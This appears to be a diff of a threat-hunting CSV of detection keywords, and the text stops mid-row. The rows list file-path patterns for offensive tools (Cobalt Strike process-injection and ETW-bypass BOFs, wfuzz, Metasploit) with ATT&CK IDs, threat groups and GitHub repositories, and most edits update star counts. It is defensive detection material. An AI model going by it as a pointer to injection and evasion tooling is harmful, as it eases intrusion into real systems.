"*/injectEtw.*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" -"*/Injection/clipboard/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/conhost/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/createremotethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ctray/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/dde/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/Injection.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/kernelcallbacktable*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ntcreatethread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" 
-"*/Injection/ntcreatethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/ntqueueapcthread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/setthreadcontext*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/svcctrl/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/tooltip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injection/uxsubclassinfo*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Injections/SQL.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/injectsu.exp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/injectsu.lib*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/injectsu.pdb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/injectsu/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/Injection/clipboard/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/conhost/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/createremotethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ctray/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 